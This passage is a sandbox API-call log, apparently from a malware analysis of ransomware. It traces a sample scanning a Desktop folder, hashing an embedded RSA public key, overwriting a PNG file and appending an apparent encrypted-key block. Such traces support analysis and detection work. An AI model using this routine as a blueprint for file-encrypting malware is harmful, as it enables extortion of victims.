nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.248] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25b2d3a0, ftCreationTime.dwHighDateTime=0x1d89828, ftLastAccessTime.dwLowDateTime=0x21e03d90, ftLastAccessTime.dwHighDateTime=0x1d8a088, ftLastWriteTime.dwLowDateTime=0x21e03d90, ftLastWriteTime.dwHighDateTime=0x1d8a088, nFileSizeHigh=0x0, nFileSizeLow=0x9fe6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Exko6hh.png", cAlternateFileName="")) returned 1 [0188.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0188.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.248] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\Exko6hh.png") returned=".png" [0188.248] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\Exko6hh.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\exko6hh.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.249] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=40934) returned 1 [0188.250] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0188.253] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9fc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.253] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0188.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0188.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.256] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.256] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x9fe6, lpOverlapped=0x0) returned 1 [0188.256] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0188.257] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.257] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.257] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0188.258] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0188.258] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.258] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0188.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0188.258] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0188.258] GetLastError () returned 0x0 [0188.258] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0188.258] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0188.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0188.258] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0188.258] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0188.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0188.258] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0188.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0188.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9ff0) returned 0x2d43778 [0188.259] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0188.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0188.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0188.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0188.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0188.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0188.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39820 [0188.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0188.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39838 [0188.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39868 [0188.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398c8 [0188.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39880 [0188.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0188.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0188.259] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0188.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0188.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39868 | out: hHeap=0x6a0000) returned 1 [0188.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39880 | out: hHeap=0x6a0000) returned 1 [0188.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398c8 | out: hHeap=0x6a0000) returned 1 [0188.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0188.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398c8 [0188.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0188.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39880 [0188.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0188.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39868 [0188.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0188.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0188.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0188.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0188.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0188.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0188.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0188.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0188.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0188.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39880 | out: hHeap=0x6a0000) returned 1 [0188.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0188.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39868 | out: hHeap=0x6a0000) returned 1 [0188.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0188.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0188.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398c8 | out: hHeap=0x6a0000) returned 1 [0188.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0188.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0188.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0188.263] GetCurrentThreadId () returned 0x264 [0188.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0188.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d38338 [0188.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0188.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0188.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0188.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0188.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0188.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0188.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.263] GetCurrentThreadId () returned 0x264 [0188.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0188.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0188.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0188.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0188.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0188.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0188.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0188.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0188.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398c8 [0188.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0188.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0188.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0188.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0188.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0188.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0188.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0188.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0188.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39868 [0188.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0188.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0188.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0188.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0188.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0188.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39880 [0188.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0188.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39850 [0188.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398e0 [0188.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0188.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0188.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0188.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398b0 [0188.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0188.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39898 [0188.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0188.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398f8 [0188.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39898 | out: hHeap=0x6a0000) returned 1 [0188.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39898 [0188.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398b0 | out: hHeap=0x6a0000) returned 1 [0188.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0188.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0188.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0188.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0188.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0188.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39868 | out: hHeap=0x6a0000) returned 1 [0188.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39868 [0188.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0188.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0188.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398c8 | out: hHeap=0x6a0000) returned 1 [0188.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0188.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398f8 | out: hHeap=0x6a0000) returned 1 [0188.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0188.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0188.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0188.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0188.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0188.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39868 | out: hHeap=0x6a0000) returned 1 [0188.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0188.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0188.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0188.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0188.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0188.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0188.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0188.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0188.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0188.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0188.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0188.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0188.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39898 | out: hHeap=0x6a0000) returned 1 [0188.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0188.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398e0 | out: hHeap=0x6a0000) returned 1 [0188.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0188.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39880 | out: hHeap=0x6a0000) returned 1 [0188.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39850 | out: hHeap=0x6a0000) returned 1 [0188.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0188.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0188.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0188.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39838 | out: hHeap=0x6a0000) returned 1 [0188.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0188.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0188.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0188.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0188.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0188.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0188.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0188.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0188.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0188.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0188.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0188.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0188.275] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x9fe1, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x9fe1, lpOverlapped=0x0) returned 1 [0188.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0188.276] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9fe6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.276] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0188.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0188.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0188.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) 